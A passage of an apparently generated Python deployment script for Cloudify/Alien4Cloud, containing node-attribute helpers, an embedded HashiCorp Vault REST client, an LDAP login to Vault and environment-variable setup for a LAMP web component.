if prop_value is not None:
# ctx.logger.debug('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, json.dumps(prop_value), entity.node.id,
# node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
# Same as previous method but will first try to find the attribute on the capability.
def _all_instances_get_target_capa_or_node_attribute(entity, capability_attribute_name, attribute_name):
result_map = {}
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
attribute_value = node_instance.runtime_properties.get(capability_attribute_name, None)
if attribute_value is not None:
prop_value = attribute_value
else:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
# ctx.logger.debug('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, json.dumps(prop_value), entity.node.id,
# node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
# ctx.logger.debug('Found the property {0} with value {1} on the node {2}'.format(property_name, json.dumps(property_value), entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
# ctx.logger.debug('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
# ctx.logger.debug('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, json.dumps(node.properties)))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
# ctx.logger.debug('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, json.dumps(mapping_configuration)))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def get_public_or_private_ip(entity):
public_ip = get_attribute(entity, 'public_ip_address')
if not public_ip:
return get_attribute(entity, 'ip_address')
return public_ip
def get_attribute_from_top_host(entity, attribute_name):
host = get_host(entity)
while host is not None:
entity = host
host = get_host(entity)
return get_attribute(entity, attribute_name)
from cloudify import utils
from cloudify_rest_client import CloudifyClient
from cloudify.state import ctx_parameters as inputs
import os
client = CloudifyClient(host=utils.get_manager_ip(),
port=utils.get_manager_rest_service_port(),
protocol='https',
cert=utils.get_local_rest_certificate(),
token= utils.get_rest_token(),
tenant= utils.get_tenant_name())
from __future__ import unicode_literals
import json
try:
import hcl
has_hcl_parser = True
except ImportError:
has_hcl_parser = False
import requests
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
class VaultError(Exception):
def __init__(self, message=None, errors=None):
if errors:
message = ', '.join(errors)
self.errors = errors
super(VaultError, self).__init__(message)
class InvalidRequest(VaultError):
pass
class Unauthorized(VaultError):
pass
class Forbidden(VaultError):
pass
class InvalidPath(VaultError):
pass
class RateLimitExceeded(VaultError):
pass
class InternalServerError(VaultError):
pass
class VaultNotInitialized(VaultError):
pass
class VaultDown(VaultError):
pass
class UnexpectedError(VaultError):
pass
class HashiCorpVaultClient(object):
def __init__(self, url='http://localhost:8200', token=None,
cert=None, verify=True, timeout=30, proxies=None,
allow_redirects=True, session=None):
if not session:
session = requests.Session()
self.allow_redirects = allow_redirects
self.session = session
self.token = token
self._url = url
self._kwargs = {
'cert': cert,
'verify': verify,
'timeout': timeout,
'proxies': proxies,
}
def read(self, path, wrap_ttl=None):
"""
GET /<path>
"""
try:
return self._get('/v1/{0}'.format(path), wrap_ttl=wrap_ttl).json()
except InvalidPath:
return None
def list(self, path):
"""
GET /<path>?list=true
"""
try:
payload = {
'list': True
}
return self._get('/v1/{}'.format(path), params=payload).json()
except InvalidPath:
return None
def write(self, path, wrap_ttl=None, **kwargs):
"""
PUT /<path>
"""
response = self._put('/v1/{0}'.format(path), json=kwargs, wrap_ttl=wrap_ttl)
if response.status_code == 200:
return response.json()
def delete(self, path):
"""
DELETE /<path>
"""
self._delete('/v1/{0}'.format(path))
def unwrap(self, token):
"""
GET /cubbyhole/response
X-Vault-Token: <token>
"""
path = "cubbyhole/response"
_token = self.token
try:
self.token = token
return json.loads(self.read(path)['data']['response'])
finally:
self.token = _token
def is_initialized(self):
"""
GET /sys/init
"""
return self._get('/v1/sys/init').json()['initialized']
def initialize(self, secret_shares=5, secret_threshold=3, pgp_keys=None):
"""
PUT /sys/init
"""
params = {
'secret_shares': secret_shares,
'secret_threshold': secret_threshold,
}
if pgp_keys:
if len(pgp_keys) != secret_shares:
raise ValueError('Length of pgp_keys must equal secret shares')
params['pgp_keys'] = pgp_keys
return self._put('/v1/sys/init', json=params).json()
@property
def seal_status(self):
"""
GET /sys/seal-status
"""
return self._get('/v1/sys/seal-status').json()
def is_sealed(self):
return self.seal_status['sealed']
def seal(self):
"""
PUT /sys/seal
"""
self._put('/v1/sys/seal')
def unseal_reset(self):
"""
PUT /sys/unseal
"""
params = {
'reset': True,
}
return self._put('/v1/sys/unseal', json=params).json()
def unseal(self, key):
"""
PUT /sys/unseal
"""
params = {
'key': key,
}
return self._put('/v1/sys/unseal', json=params).json()
def unseal_multi(self, keys):
result = None
for key in keys:
result = self.unseal(key)
if not result['sealed']:
break
return result
@property
def key_status(self):
"""
GET /sys/key-status
"""
return self._get('/v1/sys/key-status').json()
def rotate(self):
"""
PUT /sys/rotate
"""
self._put('/v1/sys/rotate')
@property
def rekey_status(self):
"""
GET /sys/rekey/init
"""
return self._get('/v1/sys/rekey/init').json()
def start_rekey(self, secret_shares=5, secret_threshold=3, pgp_keys=None,
backup=False):
"""
PUT /sys/rekey/init
"""
params = {
'secret_shares': secret_shares,
'secret_threshold': secret_threshold,
}
if pgp_keys:
if len(pgp_keys) != secret_shares:
raise ValueError('Length of pgp_keys must equal secret shares')
params['pgp_keys'] = pgp_keys
params['backup'] = backup
resp = self._put('/v1/sys/rekey/init', json=params)
if resp.text:
return resp.json()
def cancel_rekey(self):
"""
DELETE /sys/rekey/init
"""
self._delete('/v1/sys/rekey/init')
def rekey(self, key, nonce=None):
"""
PUT /sys/rekey/update
"""
params = {
'key': key,
}
if nonce:
params['nonce'] = nonce
return self._put('/v1/sys/rekey/update', json=params).json()
def rekey_multi(self, keys, nonce=None):
result = None
for key in keys:
result = self.rekey(key, nonce=nonce)
if 'complete' in result and result['complete']:
break
return result
def get_backed_up_keys(self):
"""
GET /sys/rekey/backup
"""
return self._get('/v1/sys/rekey/backup').json()
@property
def ha_status(self):
"""
GET /sys/leader
"""
return self._get('/v1/sys/leader').json()
def renew_secret(self, lease_id, increment=None):
"""
PUT /sys/leases/renew
"""
params = {
'lease_id': lease_id,
'increment': increment,
}
return self._put('/v1/sys/leases/renew', json=params).json()
def revoke_secret(self, lease_id):
"""
PUT /sys/revoke/<lease id>
"""
self._put('/v1/sys/revoke/{0}'.format(lease_id))
def revoke_secret_prefix(self, path_prefix):
"""
PUT /sys/revoke-prefix/<path prefix>
"""
self._put('/v1/sys/revoke-prefix/{0}'.format(path_prefix))
def revoke_self_token(self):
"""
PUT /auth/token/revoke-self
"""
self._put('/v1/auth/token/revoke-self')
def list_secret_backends(self):
"""
GET /sys/mounts
"""
return self._get('/v1/sys/mounts').json()
def enable_secret_backend(self, backend_type, description=None, mount_point=None, config=None):
"""
POST /sys/auth/<mount point>
"""
if not mount_point:
mount_point = backend_type
params = {
'type': backend_type,
'description': description,
'config': config,
}
self._post('/v1/sys/mounts/{0}'.format(mount_point), json=params)
def tune_secret_backend(self, backend_type, mount_point=None, default_lease_ttl=None, max_lease_ttl=None):
"""
POST /sys/mounts/<mount point>/tune
"""
if not mount_point:
mount_point = backend_type
params = {
'default_lease_ttl': default_lease_ttl,
'max_lease_ttl': max_lease_ttl
}
self._post('/v1/sys/mounts/{0}/tune'.format(mount_point), json=params)
def get_secret_backend_tuning(self, backend_type, mount_point=None):
"""
GET /sys/mounts/<mount point>/tune
"""
if not mount_point:
mount_point = backend_type
return self._get('/v1/sys/mounts/{0}/tune'.format(mount_point)).json()
def disable_secret_backend(self, mount_point):
"""
DELETE /sys/mounts/<mount point>
"""
self._delete('/v1/sys/mounts/{0}'.format(mount_point))
def remount_secret_backend(self, from_mount_point, to_mount_point):
"""
POST /sys/remount
"""
params = {
'from': from_mount_point,
'to': to_mount_point,
}
self._post('/v1/sys/remount', json=params)
def list_policies(self):
"""
GET /sys/policy
"""
return self._get('/v1/sys/policy').json()['policies']
def get_policy(self, name, parse=False):
"""
GET /sys/policy/<name>
"""
try:
policy = self._get('/v1/sys/policy/{0}'.format(name)).json()['rules']
if parse:
if not has_hcl_parser:
raise ImportError('pyhcl is required for policy parsing')
policy = hcl.loads(policy)
return policy
except InvalidPath:
return None
def set_policy(self, name, rules):
"""
PUT /sys/policy/<name>
"""
if isinstance(rules, dict):
rules = json.dumps(rules)
params = {
'rules': rules,
}
self._put('/v1/sys/policy/{0}'.format(name), json=params)
def delete_policy(self, name):
"""
DELETE /sys/policy/<name>
"""
self._delete('/v1/sys/policy/{0}'.format(name))
def list_audit_backends(self):
"""
GET /sys/audit
"""
return self._get('/v1/sys/audit').json()
def enable_audit_backend(self, backend_type, description=None, options=None, name=None):
"""
POST /sys/audit/<name>
"""
if not name:
name = backend_type
params = {
'type': backend_type,
'description': description,
'options': options,
}
self._post('/v1/sys/audit/{0}'.format(name), json=params)
def disable_audit_backend(self, name):
"""
DELETE /sys/audit/<name>
"""
self._delete('/v1/sys/audit/{0}'.format(name))
def audit_hash(self, name, input):
"""
POST /sys/audit-hash
"""
params = {
'input': input,
}
return self._post('/v1/sys/audit-hash/{0}'.format(name), json=params).json()
def create_token(self, role=None, token_id=None, policies=None, meta=None,
no_parent=False, lease=None, display_name=None,
num_uses=None, no_default_policy=False,
ttl=None, orphan=False, wrap_ttl=None, renewable=None,
explicit_max_ttl=None):
"""
POST /auth/token/create
POST /auth/token/create/<role>
POST /auth/token/create-orphan
"""
params = {
'id': token_id,
'policies': policies,
'meta': meta,
'no_parent': no_parent,
'display_name': display_name,
'num_uses': num_uses,
'no_default_policy': no_default_policy,
'renewable': renewable
}
if lease:
params['lease'] = lease
else:
params['ttl'] = ttl
params['explicit_max_ttl'] = explicit_max_ttl
if explicit_max_ttl:
params['explicit_max_ttl'] = explicit_max_ttl
if orphan:
return self._post('/v1/auth/token/create-orphan', json=params, wrap_ttl=wrap_ttl).json()
elif role:
return self._post('/v1/auth/token/create/{0}'.format(role), json=params, wrap_ttl=wrap_ttl).json()
else:
return self._post('/v1/auth/token/create', json=params, wrap_ttl=wrap_ttl).json()
def lookup_token(self, token=None, accessor=False, wrap_ttl=None):
"""
GET /auth/token/lookup/<token>
GET /auth/token/lookup-accessor/<token-accessor>
GET /auth/token/lookup-self
"""
if token:
if accessor:
path = '/v1/auth/token/lookup-accessor/{0}'.format(token)
return self._post(path, wrap_ttl=wrap_ttl).json()
else:
return self._get('/v1/auth/token/lookup/{0}'.format(token)).json()
else:
return self._get('/v1/auth/token/lookup-self', wrap_ttl=wrap_ttl).json()
def revoke_token(self, token, orphan=False, accessor=False):
"""
POST /auth/token/revoke/<token>
POST /auth/token/revoke-orphan/<token>
POST /auth/token/revoke-accessor/<token-accessor>
"""
if accessor and orphan:
msg = "revoke_token does not support 'orphan' and 'accessor' flags together"
raise InvalidRequest(msg)
elif accessor:
self._post('/v1/auth/token/revoke-accessor/{0}'.format(token))
elif orphan:
self._post('/v1/auth/token/revoke-orphan/{0}'.format(token))
else:
self._post('/v1/auth/token/revoke/{0}'.format(token))
def revoke_token_prefix(self, prefix):
"""
POST /auth/token/revoke-prefix/<prefix>
"""
self._post('/v1/auth/token/revoke-prefix/{0}'.format(prefix))
def renew_token(self, token=None, increment=None, wrap_ttl=None):
"""
POST /auth/token/renew/<token>
POST /auth/token/renew-self
"""
params = {
'increment': increment,
}
if token:
path = '/v1/auth/token/renew/{0}'.format(token)
return self._post(path, json=params, wrap_ttl=wrap_ttl).json()
else:
return self._post('/v1/auth/token/renew-self', json=params, wrap_ttl=wrap_ttl).json()
def create_token_role(self, role,
allowed_policies=None, orphan=None, period=None,
renewable=None, path_suffix=None, explicit_max_ttl=None):
"""
POST /auth/token/roles/<role>
"""
params = {
'allowed_policies': allowed_policies,
'orphan': orphan,
'period': period,
'renewable': renewable,
'path_suffix': path_suffix,
'explicit_max_ttl': explicit_max_ttl
}
return self._post('/v1/auth/token/roles/{0}'.format(role), json=params)
def token_role(self, role):
"""
Returns the named token role.
"""
return self.read('auth/token/roles/{0}'.format(role))
def delete_token_role(self, role):
"""
Deletes the named token role.
"""
return self.delete('auth/token/roles/{0}'.format(role))
def list_token_roles(self):
"""
GET /auth/token/roles?list=true
"""
return self.list('auth/token/roles')
def logout(self, revoke_token=False):
"""
Clears the token used for authentication, optionally revoking it before doing so
"""
if revoke_token:
self.revoke_self_token()
self.token = None
def is_authenticated(self):
"""
Helper method which returns the authentication status of the client
"""
if not self.token:
return False
try:
self.lookup_token()
return True
except Forbidden:
return False
except InvalidPath:
return False
except InvalidRequest:
return False
def auth_app_id(self, app_id, user_id, mount_point='app-id', use_token=True):
"""
POST /auth/<mount point>/login
"""
params = {
'app_id': app_id,
'user_id': user_id,
}
return self.auth('/v1/auth/{0}/login'.format(mount_point), json=params, use_token=use_token)
def auth_tls(self, mount_point='cert', use_token=True):
"""
POST /auth/<mount point>/login
"""
return self.auth('/v1/auth/{0}/login'.format(mount_point), use_token=use_token)
def auth_userpass(self, username, password, mount_point='userpass', use_token=True, **kwargs):
"""
POST /auth/<mount point>/login/<username>
"""
params = {
'password': password,
}
params.update(kwargs)
return self.auth('/v1/auth/{0}/login/{1}'.format(mount_point, username), json=params, use_token=use_token)
def auth_ec2(self, pkcs7, nonce=None, role=None, use_token=True):
"""
POST /auth/aws-ec2/login
"""
params = {'pkcs7': pkcs7}
if nonce:
params['nonce'] = nonce
if role:
params['role'] = role
return self.auth('/v1/auth/aws-ec2/login', json=params, use_token=use_token).json()
def create_userpass(self, username, password, policies, mount_point='userpass', **kwargs):
"""
POST /auth/<mount point>/users/<username>
"""
# Users can have more than 1 policy. It is easier for the user to pass in the
# policies as a list so if they do, we need to convert to a , delimited string.
if isinstance(policies, (list, set, tuple)):
policies = ','.join(policies)
params = {
'password': password,
'policies': policies
}
params.update(kwargs)
return self._post('/v1/auth/{}/users/{}'.format(mount_point, username), json=params)
def delete_userpass(self, username, mount_point='userpass'):
"""
DELETE /auth/<mount point>/users/<username>
"""
return self._delete('/v1/auth/{}/users/{}'.format(mount_point, username))
def create_app_id(self, app_id, policies, display_name=None, mount_point='app-id', **kwargs):
"""
POST /auth/<mount point>/map/app-id/<app_id>
"""
# app-id can have more than 1 policy. It is easier for the user to pass in the
# policies as a list so if they do, we need to convert to a , delimited string.
if isinstance(policies, (list, set, tuple)):
policies = ','.join(policies)
params = {
'value': policies
}
# Only use the display_name if it has a value. Made it a named param for user
# convienence instead of leaving it as part of the kwargs
if display_name:
params['display_name'] = display_name
params.update(kwargs)
return self._post('/v1/auth/{}/map/app-id/{}'.format(mount_point, app_id), json=params)
def get_app_id(self, app_id, mount_point='app-id', wrap_ttl=None):
"""
GET /auth/<mount_point>/map/app-id/<app_id>
"""
path = '/v1/auth/{0}/map/app-id/{1}'.format(mount_point, app_id)
return self._get(path, wrap_ttl=wrap_ttl).json()
def delete_app_id(self, app_id, mount_point='app-id'):
"""
DELETE /auth/<mount_point>/map/app-id/<app_id>
"""
return self._delete('/v1/auth/{0}/map/app-id/{1}'.format(mount_point, app_id))
def create_user_id(self, user_id, app_id, cidr_block=None, mount_point='app-id', **kwargs):
"""
POST /auth/<mount point>/map/user-id/<user_id>
"""
# user-id can be associated to more than 1 app-id (aka policy). It is easier for the user to
# pass in the policies as a list so if they do, we need to convert to a , delimited string.
if isinstance(app_id, (list, set, tuple)):
app_id = ','.join(app_id)
params = {
'value': app_id
}
# Only use the cidr_block if it has a value. Made it a named param for user
# convienence instead of leaving it as part of the kwargs
if cidr_block:
params['cidr_block'] = cidr_block
params.update(kwargs)
return self._post('/v1/auth/{}/map/user-id/{}'.format(mount_point, user_id), json=params)
def get_user_id(self, user_id, mount_point='app-id', wrap_ttl=None):
"""
GET /auth/<mount_point>/map/user-id/<user_id>
"""
path = '/v1/auth/{0}/map/user-id/{1}'.format(mount_point, user_id)
return self._get(path, wrap_ttl=wrap_ttl).json()
def delete_user_id(self, user_id, mount_point='app-id'):
"""
DELETE /auth/<mount_point>/map/user-id/<user_id>
"""
return self._delete('/v1/auth/{0}/map/user-id/{1}'.format(mount_point, user_id))
def create_vault_ec2_client_configuration(self, access_key, secret_key, endpoint=None):
"""
POST /auth/aws-ec2/config/client
"""
params = {
'access_key': access_key,
'secret_key': secret_key
}
if endpoint is not None:
params['endpoint'] = endpoint
return self._post('/v1/auth/aws-ec2/config/client', json=params)
def get_vault_ec2_client_configuration(self):
"""
GET /auth/aws-ec2/config/client
"""
return self._get('/v1/auth/aws-ec2/config/client').json()
def delete_vault_ec2_client_configuration(self):
"""
DELETE /auth/aws-ec2/config/client
"""
return self._delete('/v1/auth/aws-ec2/config/client')
def create_vault_ec2_certificate_configuration(self, cert_name, aws_public_cert):
"""
POST /auth/aws-ec2/config/certificate/<cert_name>
"""
params = {
'cert_name': cert_name,
'aws_public_cert': aws_public_cert
}
return self._post('/v1/auth/aws-ec2/config/certificate/{0}'.format(cert_name), json=params)
def get_vault_ec2_certificate_configuration(self, cert_name):
"""
GET /auth/aws-ec2/config/certificate/<cert_name>
"""
return self._get('/v1/auth/aws-ec2/config/certificate/{0}'.format(cert_name)).json()
def list_vault_ec2_certificate_configurations(self):
"""
GET /auth/aws-ec2/config/certificates?list=true
"""
params = {'list': True}
return self._get('/v1/auth/aws-ec2/config/certificates', params=params).json()
def create_ec2_role(self, role, bound_ami_id=None, bound_account_id=None, bound_iam_role_arn=None,
bound_iam_instance_profile_arn=None, role_tag=None, max_ttl=None, policies=None,
allow_instance_migration=False, disallow_reauthentication=False, **kwargs):
"""
POST /auth/aws-ec2/role/<role>
"""
params = {
'role': role,
'disallow_reauthentication': disallow_reauthentication,
'allow_instance_migration': allow_instance_migration
}
if bound_ami_id is not None:
params['bound_ami_id'] = bound_ami_id
if bound_account_id is not None:
params['bound_account_id'] = bound_account_id
if bound_iam_role_arn is not None:
params['bound_iam_role_arn'] = bound_iam_role_arn
if bound_iam_instance_profile_arn is not None:
params['bound_iam_instance_profile_arn'] = bound_iam_instance_profile_arn
if role_tag is not None:
params['role_tag'] = role_tag
if max_ttl is not None:
params['max_ttl'] = max_ttl
if policies is not None:
params['policies'] = policies
params.update(**kwargs)
return self._post('/v1/auth/aws-ec2/role/{0}'.format(role), json=params)
def get_ec2_role(self, role):
"""
GET /auth/aws-ec2/role/<role>
"""
return self._get('/v1/auth/aws-ec2/role/{0}'.format(role)).json()
def delete_ec2_role(self, role):
"""
DELETE /auth/aws-ec2/role/<role>
"""
return self._delete('/v1/auth/aws-ec2/role/{0}'.format(role))
def list_ec2_roles(self):
"""
GET /auth/aws-ec2/roles?list=true
"""
try:
return self._get('/v1/auth/aws-ec2/roles', params={'list': True}).json()
except InvalidPath:
return None
def create_ec2_role_tag(self, role, policies=None, max_ttl=None, instance_id=None,
disallow_reauthentication=False, allow_instance_migration=False):
"""
POST /auth/aws-ec2/role/<role>/tag
"""
params = {
'role': role,
'disallow_reauthentication': disallow_reauthentication,
'allow_instance_migration': allow_instance_migration
}
if max_ttl is not None:
params['max_ttl'] = max_ttl
if policies is not None:
params['policies'] = policies
if instance_id is not None:
params['instance_id'] = instance_id
return self._post('/v1/auth/aws-ec2/role/{0}/tag'.format(role), json=params).json()
def auth_ldap(self, username, password, mount_point='ldap', use_token=True, **kwargs):
"""
POST /auth/<mount point>/login/<username>
"""
params = {
'password': password,
}
params.update(kwargs)
return self.auth('/v1/auth/{0}/login/{1}'.format(mount_point, username), json=params, use_token=use_token)
def auth_github(self, token, mount_point='github', use_token=True):
"""
POST /auth/<mount point>/login
"""
params = {
'token': token,
}
return self.auth('/v1/auth/{0}/login'.format(mount_point), json=params, use_token=use_token)
def auth(self, url, use_token=True, **kwargs):
response = self._post(url, **kwargs).json()
if use_token:
self.token = response['auth']['client_token']
return response
def list_auth_backends(self):
"""
GET /sys/auth
"""
return self._get('/v1/sys/auth').json()
def enable_auth_backend(self, backend_type, description=None, mount_point=None):
"""
POST /sys/auth/<mount point>
"""
if not mount_point:
mount_point = backend_type
params = {
'type': backend_type,
'description': description,
}
self._post('/v1/sys/auth/{0}'.format(mount_point), json=params)
def disable_auth_backend(self, mount_point):
"""
DELETE /sys/auth/<mount point>
"""
self._delete('/v1/sys/auth/{0}'.format(mount_point))
def create_role(self, role_name, **kwargs):
"""
POST /auth/approle/role/<role name>
"""
self._post('/v1/auth/approle/role/{0}'.format(role_name), json=kwargs)
def list_roles(self):
"""
GET /auth/approle/role
"""
return self._get('/v1/auth/approle/role?list=true').json()
def get_role_id(self, role_name):
"""
GET /auth/approle/role/<role name>/role-id
"""
url = '/v1/auth/approle/role/{0}/role-id'.format(role_name)
return self._get(url).json()['data']['role_id']
def set_role_id(self, role_name, role_id):
"""
POST /auth/approle/role/<role name>/role-id
"""
url = '/v1/auth/approle/role/{0}/role-id'.format(role_name)
params = {
'role_id': role_id
}
self._post(url, json=params)
def get_role(self, role_name):
"""
GET /auth/approle/role/<role name>
"""
return self._get('/v1/auth/approle/role/{0}'.format(role_name)).json()
def create_role_secret_id(self, role_name, meta=None):
"""
POST /auth/approle/role/<role name>/secret-id
"""
url = '/v1/auth/approle/role/{0}/secret-id'.format(role_name)
params = {}
if meta is not None:
params['metadata'] = json.dumps(meta)
return self._post(url, json=params).json()
def get_role_secret_id(self, role_name, secret_id):
"""
POST /auth/approle/role/<role name>/secret-id/lookup
"""
url = '/v1/auth/approle/role/{0}/secret-id/lookup'.format(role_name)
params = {
'secret_id': secret_id
}
return self._post(url, json=params).json()
def list_role_secrets(self, role_name):
"""
GET /auth/approle/role/<role name>/secret-id?list=true
"""
url = '/v1/auth/approle/role/{0}/secret-id?list=true'.format(role_name)
return self._get(url).json()
def get_role_secret_id_accessor(self, role_name, secret_id_accessor):
"""
GET /auth/approle/role/<role name>/secret-id-accessor/<secret_id_accessor>
"""
url = '/v1/auth/approle/role/{0}/secret-id-accessor/{1}'.format(role_name, secret_id_accessor)
return self._get(url).json()
def delete_role_secret_id(self, role_name, secret_id):
"""
POST /auth/approle/role/<role name>/secret-id/destroy
"""
url = '/v1/auth/approle/role/{0}/secret-id/destroy'.format(role_name)
params = {
'secret_id': secret_id
}
self._post(url, json=params)
def delete_role_secret_id_accessor(self, role_name, secret_id_accessor):
"""
DELETE /auth/approle/role/<role name>/secret-id/<secret_id_accessor>
"""
url = '/v1/auth/approle/role/{0}/secret-id-accessor/{1}'.format(role_name, secret_id_accessor)
self._delete(url)
def create_role_custom_secret_id(self, role_name, secret_id, meta=None):
"""
POST /auth/approle/role/<role name>/custom-secret-id
"""
url = '/v1/auth/approle/role/{0}/custom-secret-id'.format(role_name)
params = {
'secret_id': secret_id
}
if meta is not None:
params['meta'] = meta
return self._post(url, json=params).json()
def auth_approle(self, role_id, secret_id=None, mount_point='approle', use_token=True):
"""
POST /auth/approle/login
"""
params = {
'role_id': role_id
}
if secret_id is not None:
params['secret_id'] = secret_id
return self.auth('/v1/auth/{0}/login'.format(mount_point), json=params, use_token=use_token)
def close(self):
"""
Close the underlying Requests session
"""
self.session.close()
def _get(self, url, **kwargs):
return self.__request('get', url, **kwargs)
def _post(self, url, **kwargs):
return self.__request('post', url, **kwargs)
def _put(self, url, **kwargs):
return self.__request('put', url, **kwargs)
def _delete(self, url, **kwargs):
return self.__request('delete', url, **kwargs)
def __request(self, method, url, headers=None, **kwargs):
url = urljoin(self._url, url)
if not headers:
headers = {}
if self.token:
headers['X-Vault-Token'] = self.token
wrap_ttl = kwargs.pop('wrap_ttl', None)
if wrap_ttl:
headers['X-Vault-Wrap-TTL'] = str(wrap_ttl)
_kwargs = self._kwargs.copy()
_kwargs.update(kwargs)
response = self.session.request(method, url, headers=headers,
allow_redirects=False, **_kwargs)
# NOTE(ianunruh): workaround for https://github.com/ianunruh/hvac/issues/51
while response.is_redirect and self.allow_redirects:
url = urljoin(self._url, response.headers['Location'])
response = self.session.request(method, url, headers=headers,
allow_redirects=False, **_kwargs)
if response.status_code >= 400 and response.status_code < 600:
text = errors = None
if response.headers.get('Content-Type') == 'application/json':
errors = response.json().get('errors')
if errors is None:
text = response.text
self.__raise_error(response.status_code, text, errors=errors)
return response
def __raise_error(self, status_code, message=None, errors=None):
if status_code == 400:
raise InvalidRequest(message, errors=errors)
elif status_code == 401:
raise Unauthorized(message, errors=errors)
elif status_code == 403:
raise Forbidden(message, errors=errors)
elif status_code == 404:
raise InvalidPath(message, errors=errors)
elif status_code == 429:
raise RateLimitExceeded(message, errors=errors)
elif status_code == 500:
raise InternalServerError(message, errors=errors)
elif status_code == 501:
raise VaultNotInitialized(message, errors=errors)
elif status_code == 503:
raise VaultDown(message, errors=errors)
else:
raise UnexpectedError(message)
def connect_to_vault_by_token(url, token):
return HashiCorpVaultClient(url=url, token=token)
def connect_to_vault_by_ldap(url, user, password):
client = HashiCorpVaultClient(url=url)
client.auth_ldap(user, password)
return client
credentials = json.loads(client.secrets.get('vault-credentials-testGenerateLamp'))
vault_client = connect_to_vault_by_ldap(url = 'https://localhost', user = credentials.user, password = credentials.password)
def get_secret(secret_path):
return vault_client.read(secret_path)
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
env_map['SELF_CAPABILITIES_data_endpoint_initiator'] = r'source'
env_map['SELF_CAPABILITIES_admin_endpoint_port'] = ''
env_map['SELF_document_root'] = r'/var/www'
env_map['SELF_CAPABILITIES_admin_endpoint_network_name'] = r'PRIVATE'
env_map['SELF_CAPABILITIES_data_endpoint_network_name'] = r'PRIVATE'
env_map['SELF_CAPABILITIES_admin_endpoint_initiator'] = r'source'
env_map['SELF_CAPABILITIES_host_mem_size'] = ''
env_map['SELF_CAPABILITIES_data_endpoint_port_name'] = ''
env_map['SELF_port'] = r'80'
env_map['SELF_CAPABILITIES_host_num_cpus'] = ''
env_map['SELF_CAPABILITIES_data_endpoint_port'] = ''
env_map['SELF_CAPABILITIES_host_disk_size'] = ''
env_map['SELF_CAPABILITIES_data_endpoint_secure'] = r'false'
env_map['SELF_CAPABILITIES_data_endpoint_protocol'] = r'tcp'
env_map['SELF_CAPABILITIES_data_endpoint_url_path'] = ''
env_map['SELF_CAPABILITIES_admin_endpoint_secure'] = r'true'
env_map['SELF_CAPABILITIES_admin_endpoint_url_path'] = ''
env_map['SELF_component_version'] = r'2.4'
env_map['SELF_CAPABILITIES_host_cpu_frequency'] = ''
env_map['SELF_CAPABILITIES_admin_endpoint_protocol'] = r'tcp'
env_map['SELF_CAPABILITIES_admin_endpoint_port_name'] = ''
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
